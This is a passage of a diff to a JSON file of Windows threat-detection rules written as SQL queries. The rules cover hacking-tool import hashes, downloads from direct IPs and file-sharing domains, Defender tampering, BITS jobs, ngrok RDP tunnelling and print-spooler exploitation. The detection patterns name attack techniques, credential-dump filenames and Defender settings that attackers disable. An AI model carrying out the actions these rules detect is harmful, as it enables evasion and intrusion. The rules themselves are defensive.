'%IMPHASH=13F08707F759AF6003837A150A371BA1%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=1781F06048A7E58B323F0B9259BE798B%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=233F85F2D4BC9D6521A6CAAE11A1E7F5%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=24AF2584CBF4D60BBE5C6D1B31B3BE6D%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=632969DDF6DBF4E0F53424B75E4B91F2%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=713C29B396B907ED71A72482759ED757%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=749A7BB1F0B4C4455949C0B2BF7F9E9F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=8628B2608957A6B0C6330AC3DE28CE2E%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=8B114550386E31895DFAB371E741123D%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=94CB940A1A6B65BED4D5A8F849CE9793%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=9D68781980370E00E0BD939EE5E6C141%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=B18A1401FF8F444056D29450FBC0A6CE%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=CB567F9498452721D77A451374955F5F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=730073214094CD328547BF1F72289752%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=17B461A082950FC6332228572138B80C%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=DC25EE78E2EF4D36FAA0BADF1E7461C9%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=819B19D53CA6736448F9325A85736792%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=829DA329CE140D873B4A8BDE2CBFAA7E%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=C547F2E66061A8DFFB6F5A3FF63C0A74%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0588081AB0E63BA785938467E1B10CCA%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0D9EC08BAC6C07D9987DFD0F1506587C%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=BC129092B71C89B4D4C8CDF8EA590B29%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=4DA924CF622D039D58BCE71CDF05D242%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=E7A3A5C377E2D29324093377D7DB1C66%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=9A9DBEC5C62F0380B4FA5FD31DEFFEDF%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=AF8A3976AD71E5D5FDFB67DDB8DADFCE%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0C477898BBF137BBD6F2A54E3B805FF4%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0CA9F02B537BCEA20D4EA5EB1A9FE338%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3AB3655E5A14D4EEFC547F4781BF7F9E%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=E6F9D5152DA699934B30DAAB206471F6%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3AD59991CCF1D67339B319B15A41B35D%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=FFDD59E0318B85A3E480874D9796D872%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0CF479628D7CC1EA25EC7998A92F5051%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=07A2D4DCBD6CB2C6A45E6B101F0B6D51%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=D6D0F80386E1380D05CB78E871BC72B1%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=38D9E015591BBFD4929E0D0F47FA0055%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0E2216679CA6E1094D63322E3412D650%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=ADA161BF41B8E5E9132858CB54CAB5FB%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=2A1BC4913CD5ECB0434DF07CB675B798%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=11083E75553BAAE21DC89CE8F9A195E4%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=A23D29C9E566F2FA8FFBB79267F5DF80%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=4A07F944A83E8A7C2525EFA35DD30E2F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=767637C23BB42CD5D7397CF58B0BE688%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=14C4E4C72BA075E9069EE67F39188AD8%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=7D010C6BB6A3726F327F7E239166D127%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=89159BA4DD04E4CE5559F132A9964EB3%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=5834ED4291BDEB928270428EBBAF7604%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3DE09703C8E79ED2CA3F01074719906B%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=A53A02B997935FD8EEDCB5F7ABAB9B9F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=E96A73C7BF33A464C510EDE582318BF2%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=32089B8851BBF8BC2D014E9F37288C83%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=09D278F9DE118EF09163C6140255C690%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=03866661686829d806989e2fc5a72606%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=e57401fbdadcd4571ff385ab82bd5d6d%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=84B763C45C0E4A3E7CA5548C710DB4EE%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=19584675D94829987952432E018D5056%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=330768A4F172E10ACB6287B87289D83B%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=885C99CCFBE77D1CBFCB9C4E7C1A3313%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=22A22BC9E4E0D2F189F1EA01748816AC%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=7FA30E6BB7E8E8A69155636E50BF1B28%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '1116' AND SourceName = 'AMSI')" ], - "filename": "create_stream_hash_hacktool_download.yml" + "filename": "win_defender_amsi_trigger.yml" }, { - "title": "Unusual File Download from Direct IP Address", - "id": "025bd229-fd1f-4fdb-97ab-20006e1a5368", + "title": "Windows Defender Exploit Guard Tamper", + "id": "a3ab73f1-bd46-4319-8f06-4b20d0617886", "status": "experimental", - "description": "Detects the download of suspicious file type from URLs with IP", - "author": "Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)", + "description": "Detects when someone is adding or removing applications or folder from exploit guard \"ProtectedFolders\" and \"AllowedApplications\"", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1564.004" + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Contents REGEXP 'http[s]?://[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}' AND (TargetFilename LIKE '%.ps1:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.bat:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.exe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbs:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.dll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.one:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.cmd:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.hta:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.xll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.lnk:Zone%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND ((EventID = '5007' AND NewValue LIKE '%\\\\Windows Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\AllowedApplications\\\\%' ESCAPE '\\' AND (NewValue LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')) OR (EventID = '5007' AND OldValue LIKE '%\\\\Windows Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\ProtectedFolders\\\\%' ESCAPE '\\')))" ], - "filename": "create_stream_hash_susp_ip_domains.yml" + "filename": "win_defender_exploit_guard_tamper.yml" }, { - "title": "Exports Registry Key To an Alternate Data Stream", - "id": "0d7a9363-af70-4e7b-a3b7-1a176b7fbe84", - "status": "test", - "description": "Exports the target Registry key and hides it in the specified alternate data stream.", - "author": "Oddvar Moe, Sander Wiebing, oscd.community", + "title": "Microsoft Defender Tamper Protection Trigger", + "id": "49e5bc24-8b86-49f1-b743-535f332c2856", + "status": "stable", + "description": "Detects blocked attempts to change any of Defender's settings such as \"Real Time Monitoring\" and \"Behavior Monitoring\"", + "author": "Bhabesh Raj, Nasreddine Bencherchali", "tags": [ "attack.defense_evasion", - "attack.t1564.004" + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Administrator might try to disable defender features during testing (must be investigated)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE NewProcessName LIKE '%\\\\regedit.exe' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '5013' AND (Value LIKE '%\\\\Windows Defender\\\\DisableAntiSpyware' ESCAPE '\\' OR Value LIKE '%\\\\Windows Defender\\\\DisableAntiVirus' ESCAPE '\\' OR Value LIKE '%\\\\Windows Defender\\\\Scan\\\\DisableArchiveScanning' ESCAPE '\\' OR Value LIKE '%\\\\Windows Defender\\\\Scan\\\\DisableScanningNetworkFiles' ESCAPE '\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableRealtimeMonitoring' ESCAPE '\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableBehaviorMonitoring' ESCAPE '\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableIOAVProtection' ESCAPE '\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableScriptScanning' ESCAPE '\\'))" ], - "filename": "create_stream_hash_regedit_export_to_ads.yml" + "filename": "win_defender_tamper_protection_trigger.yml" }, { - "title": "Suspicious File Download From File Sharing Websites", - "id": "52182dfb-afb7-41db-b4bc-5336cb29b464", - "status": "experimental", - "description": "Detects the download of suspicious file type from a well-known file and paste sharing domain", - "author": "Florian Roth (Nextron Systems)", + "title": "Windows Defender Suspicious Configuration Changes", + "id": "801bd44f-ceed-4eb6-887c-11544633c0aa", + "status": "stable", + "description": "Detects suspicious changes to the windows defender configuration", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.s0139", - "attack.t1564.004" + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Administrator activity (must be investigated)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((Contents LIKE '%https://transfer.sh/%' ESCAPE '\\' OR Contents LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR Contents LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR Contents LIKE '%pastebin.com%' ESCAPE '\\' OR Contents LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR Contents LIKE '%mediafire.com%' ESCAPE '\\' OR Contents LIKE '%mega.nz%' ESCAPE '\\' OR Contents LIKE '%ddns.net%' ESCAPE '\\' OR Contents LIKE '%.paste.ee%' ESCAPE '\\' OR Contents LIKE '%.hastebin.com%' ESCAPE '\\' OR Contents LIKE '%.ghostbin.co/%' ESCAPE '\\' OR Contents LIKE '%ufile.io%' ESCAPE '\\' OR Contents LIKE '%storage.googleapis.com%' ESCAPE '\\' OR Contents LIKE '%anonfiles.com%' ESCAPE '\\' OR Contents LIKE '%send.exploit.in%' ESCAPE '\\' OR Contents LIKE '%privatlab.net%' ESCAPE '\\' OR Contents LIKE '%privatlab.com%' ESCAPE '\\' OR Contents LIKE '%sendspace.com%' ESCAPE '\\' OR Contents LIKE '%pastetext.net%' ESCAPE '\\' OR Contents LIKE '%pastebin.pl%' ESCAPE '\\' OR Contents LIKE '%paste.ee%' ESCAPE '\\') AND (TargetFilename LIKE '%.exe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbs:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.dll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.one:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.hta:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.lnk:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.xll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.cpl:Zone%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '5007' AND (NewValue LIKE '%\\\\Windows Defender\\\\DisableAntiSpyware %' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows Defender\\\\Scan\\\\DisableRemovableDriveScanning %' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows Defender\\\\Scan\\\\DisableScanningMappedNetworkDrivesForFullScan %' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows Defender\\\\SpyNet\\\\DisableBlockAtFirstSeen %' ESCAPE '\\' OR NewValue LIKE '%\\\\Real-Time Protection\\\\SpyNetReporting %' ESCAPE '\\' OR NewValue LIKE '%\\\\Real-Time Protection\\\\SubmitSamplesConsent %' ESCAPE '\\'))" ], - "filename": "create_stream_hash_file_sharing_domains_download_susp_extension.yml" + "filename": "win_defender_suspicious_features_tampering.yml" }, { - "title": "Suspicious NTDS Exfil Filename Patterns", - "id": "3a8da4e0-36c1-40d2-8b29-b3e890d5172a", - "status": "test", - "description": "Detects suspicious creations of files with names used in various tools that export the NTDS.DIT for exfiltration", + "title": "BITS Transfer Job Download To Potential Suspicious Folder", + "id": "f8a56cb7-a363-44ed-a82f-5926bb44cd05", + "status": "experimental", + "description": "Detects new BITS transfer job where the LocalName/Saved file is stored in a potentially suspicious location", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.003" + "attack.defense_evasion", + "attack.persistence", + "attack.t1197" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\All.cab' ESCAPE '\\' OR TargetFilename LIKE '%.ntds.cleartext' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND EventID = '16403' AND (LocalName LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR LocalName LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR LocalName LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\'))" ], - "filename": "file_event_win_ntds_exfil_tools.yml" + "filename": "win_bits_client_new_trasnfer_susp_local_folder.yml" }, { - "title": "Office Template Creation", - "id": "0e20c89d-2264-44ae-8238-aeeaba609ece", + "title": "BITS Transfer Job Download From Direct IP", + "id": "90f138c1-f578-4ac3-8c49-eecfd847c8b7", "status": "experimental", - "description": "Detects creation of template files for Microsoft Office from outside Office", - "author": "Max Altgelt (Nextron Systems)", + "description": "Detects a BITS transfer job downloading file(s) from a direct IP address.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.defense_evasion", "attack.persistence", - "attack.t1137" + "attack.t1197" ], "falsepositives": [ - "Loading a user environment from a backup or a domain controller", - "Synchronization of templates" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((((TargetFilename LIKE '%.dot' ESCAPE '\\' OR TargetFilename LIKE '%.dotm' ESCAPE '\\' OR TargetFilename LIKE '%.doc' ESCAPE '\\' OR TargetFilename LIKE '%.docm' ESCAPE '\\' OR TargetFilename LIKE '%.docx' ESCAPE '\\' OR TargetFilename LIKE '%.rtf' ESCAPE '\\') AND TargetFilename LIKE '%\\\\Microsoft\\\\Word\\\\Startup%' ESCAPE '\\') OR ((TargetFilename LIKE '%.xlt' ESCAPE '\\' OR TargetFilename LIKE '%.xltm' ESCAPE '\\' OR TargetFilename LIKE '%.xls' ESCAPE '\\' OR TargetFilename LIKE '%.xlsm' ESCAPE '\\' OR TargetFilename LIKE '%.xlsx' ESCAPE '\\') AND TargetFilename LIKE '%\\\\Microsoft\\\\Excel\\\\Startup%' ESCAPE '\\')) AND NOT ((NewProcessName LIKE '%\\\\WINWORD.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\EXCEL.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND (EventID = '16403' AND (RemoteName LIKE '%http://1%' ESCAPE '\\' OR RemoteName LIKE '%http://2%' ESCAPE '\\' OR RemoteName LIKE '%http://3%' ESCAPE '\\' OR RemoteName LIKE '%http://4%' ESCAPE '\\' OR RemoteName LIKE '%http://5%' ESCAPE '\\' OR RemoteName LIKE '%http://6%' ESCAPE '\\' OR RemoteName LIKE '%http://7%' ESCAPE '\\' OR RemoteName LIKE '%http://8%' ESCAPE '\\' OR RemoteName LIKE '%http://9%' ESCAPE '\\' OR RemoteName LIKE '%https://1%' ESCAPE '\\' OR RemoteName LIKE '%https://2%' ESCAPE '\\' OR RemoteName LIKE '%https://3%' ESCAPE '\\' OR RemoteName LIKE '%https://4%' ESCAPE '\\' OR RemoteName LIKE '%https://5%' ESCAPE '\\' OR RemoteName LIKE '%https://6%' ESCAPE '\\' OR RemoteName LIKE '%https://7%' ESCAPE '\\' OR RemoteName LIKE '%https://8%' ESCAPE '\\' OR RemoteName LIKE '%https://9%' ESCAPE '\\')) AND NOT (((RemoteName LIKE '%://10.%' ESCAPE '\\' OR RemoteName LIKE '%://192.168.%' ESCAPE '\\' OR RemoteName LIKE '%://172.16.%' ESCAPE '\\' OR RemoteName LIKE '%://172.17.%' ESCAPE '\\' OR RemoteName LIKE '%://172.18.%' ESCAPE '\\' OR RemoteName LIKE '%://172.19.%' ESCAPE '\\' OR RemoteName LIKE '%://172.20.%' ESCAPE '\\' OR RemoteName LIKE '%://172.21.%' ESCAPE '\\' OR RemoteName LIKE '%://172.22.%' ESCAPE '\\' OR RemoteName LIKE '%://172.23.%' ESCAPE '\\' OR RemoteName LIKE '%://172.24.%' ESCAPE '\\' OR RemoteName LIKE '%://172.25.%' ESCAPE '\\' OR RemoteName LIKE '%://172.26.%' ESCAPE '\\' OR RemoteName LIKE '%://172.27.%' ESCAPE '\\' OR RemoteName LIKE '%://172.28.%' ESCAPE '\\' OR RemoteName LIKE '%://172.29.%' ESCAPE '\\' OR RemoteName LIKE '%://172.30.%' ESCAPE '\\' OR RemoteName LIKE '%://172.31.%' ESCAPE '\\' OR RemoteName LIKE '%://127.%' ESCAPE '\\' OR RemoteName LIKE '%://169.254.%' ESCAPE '\\')) OR ((RemoteName LIKE '%https://7-%' ESCAPE '\\' OR RemoteName LIKE '%http://7-%' ESCAPE '\\'))))" ], - "filename": "file_event_win_word_template_creation.yml" + "filename": "win_bits_client_new_transfer_via_ip_address.yml" }, { - "title": "InstallerFileTakeOver LPE CVE-2021-41379 File Create Event", - "id": "3be82d5d-09fe-4d6a-a275-0d40d234d324", - "status": "test", - "description": "Detects signs of the exploitation of LPE CVE-2021-41379 that include an msiexec process that creates an elevation_service.exe file", + "title": "BITS Transfer Job Download From File Sharing Domains", + "id": "d635249d-86b5-4dad-a8c7-d7272b788586", + "status": "experimental", + "description": "Detects BITS transfer job downloading files from a file sharing domain.", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1068" + "attack.defense_evasion", + "attack.persistence", + "attack.t1197" ], "falsepositives": [ - "Unknown", - "Possibly some Microsoft Edge upgrades" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\elevation\\_service.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND EventID = '16403' AND (RemoteName LIKE '%.ghostbin.co/%' ESCAPE '\\' OR RemoteName LIKE '%.hastebin.com%' ESCAPE '\\' OR RemoteName LIKE '%.paste.ee%' ESCAPE '\\' OR RemoteName LIKE '%anonfiles.com%' ESCAPE '\\' OR RemoteName LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR RemoteName LIKE '%ddns.net%' ESCAPE '\\' OR RemoteName LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR RemoteName LIKE '%mediafire.com%' ESCAPE '\\' OR RemoteName LIKE '%mega.nz%' ESCAPE '\\' OR RemoteName LIKE '%paste.ee%' ESCAPE '\\' OR RemoteName LIKE '%pastebin.com%' ESCAPE '\\' OR RemoteName LIKE '%pastebin.pl%' ESCAPE '\\' OR RemoteName LIKE '%pastetext.net%' ESCAPE '\\' OR RemoteName LIKE '%privatlab.com%' ESCAPE '\\' OR RemoteName LIKE '%privatlab.net%' ESCAPE '\\' OR RemoteName LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR RemoteName LIKE '%send.exploit.in%' ESCAPE '\\' OR RemoteName LIKE '%sendspace.com%' ESCAPE '\\' OR RemoteName LIKE '%storage.googleapis.com%' ESCAPE '\\' OR RemoteName LIKE '%transfer.sh%' ESCAPE '\\' OR RemoteName LIKE '%ufile.io%' ESCAPE '\\'))" ], - "filename": "file_event_win_cve_2021_41379_msi_lpe.yml" + "filename": "win_bits_client_new_transfer_via_file_sharing_domains.yml" }, { - "title": "Legitimate Application Dropped Executable", - "id": "f0540f7e-2db3-4432-b9e0-3965486744bc", + "title": "Ngrok Usage with Remote Desktop Service", + "id": "64d51a51-32a6-49f0-9f3d-17e34d640272", "status": "experimental", - "description": "Detects programs on a Windows system that should not write executables to disk", - "author": "frack113, Florian Roth", + "description": "Detects cases in which ngrok, a reverse proxy tool, forwards events to the local RDP port, which could be a sign of malicious behaviour", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.command_and_control", + "attack.t1090" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\visio.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wordview.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certoc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\CertReq.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Desktopimgdownldr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\finger.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\notepad.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AcroRd32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RdrCEF.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.ocx' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-TerminalServices-LocalSessionManager/Operational' AND EventID = '21' AND Address LIKE '%16777216%' ESCAPE '\\')" ], - "filename": "file_event_win_legitimate_app_dropping_exe.yml" + "filename": "win_terminalservices_rdp_ngrok.yml" }, { - "title": "Hijack Legit RDP Session to Move Laterally", - "id": "52753ea4-b3a0-4365-910d-36cff487b789", + "title": "CVE-2021-1675 Print Spooler Exploitation", + "id": "f34d942d-c8c4-4f1f-b196-22471aecf10a", "status": "test", - "description": "Detects the usage of tsclient share to place a backdoor on the RDP source machine's startup folder", - "author": "Samir Bousseaden", + "description": "Detects driver load events print service operational log that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.execution", + "attack.t1569", + "cve.2021.1675" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\mstsc.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-PrintService/Operational' AND EventID = '316' AND (logs MATCH ('\"UNIDRV.DLL, kernelbase.dll, \" OR \" 123 \" OR \" 1234 \" OR \"mimispool\"')))" ], - "filename": "file_event_win_tsclient_filewrite_startup.yml" + "filename": "win_exploit_cve_2021_1675_printspooler_operational.yml" }, { - "title": "Suspicious ASPX File Drop by Exchange", - "id": "bd1212e5-78da-431e-95fa-c58e3237a8e6", + "title": "Code Integrity Attempted DLL Load", + "id": "f8931561-97f5-4c46-907f-0a4a592e47a7", + "description": "Detects attempted DLL load events that didn't meet anti-malware or Windows signing level requirements. It often means the file's signature is revoked or expired", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", "status": "experimental", - "description": "Detects suspicious file type dropped by an Exchange component in IIS into a suspicious folder", - "author": "Florian Roth (Nextron Systems), MSTI (query, idea)", "tags": [ - "attack.persistence", - "attack.t1505.003" + "attack.execution" ], "falsepositives": [ - "Unknown" + "Antivirus products" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' AND CommandLine LIKE '%MSExchange%' ESCAPE '\\' AND (TargetFilename LIKE '%FrontEnd\\\\HttpProxy\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\inetpub\\\\wwwroot\\\\aspnet\\_client\\\\%' ESCAPE '\\') AND (TargetFilename LIKE '%.aspx' ESCAPE '\\' OR TargetFilename LIKE '%.asp' ESCAPE '\\' OR TargetFilename LIKE '%.ashx' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-CodeIntegrity/Operational' AND EventID = '3033' AND NOT ((FileNameBuffer LIKE '%\\\\Program Files\\\\DTrace\\\\dtrace.dll' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND RequestedPolicy = '12' AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Windows\\\\System32\\\\DriverStore\\\\FileRepository\\\\%' ESCAPE '\\' AND FileNameBuffer LIKE '%\\\\igd10iumd64.dll' ESCAPE '\\' AND RequestedPolicy = '7' AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Windows\\\\System32\\\\nvspcap64.dll' ESCAPE '\\' AND (ProcessNameBuffer LIKE '%\\\\AppData\\\\Local\\\\Keybase\\\\Gui\\\\Keybase.exe' ESCAPE '\\' OR ProcessNameBuffer LIKE '%\\\\Microsoft\\\\Teams\\\\stage\\\\Teams.exe' ESCAPE '\\') AND RequestedPolicy = '8' AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Program Files\\\\Bonjour\\\\mdnsNSP.dll' ESCAPE '\\' AND (ProcessNameBuffer LIKE '%\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' OR ProcessNameBuffer LIKE '%\\\\Windows\\\\System32\\\\SIHClient.exe' ESCAPE '\\') AND RequestedPolicy IN ('8', '12') AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Microsoft Office\\\\root\\\\vfs\\\\ProgramFilesCommonX64\\\\Microsoft Shared\\\\OFFICE%' ESCAPE '\\' AND FileNameBuffer LIKE '%\\\\MSOXMLMF.DLL' ESCAPE '\\' AND RequestedPolicy = '7' AND ValidatedPolicy = '1') OR (FileNameBuffer 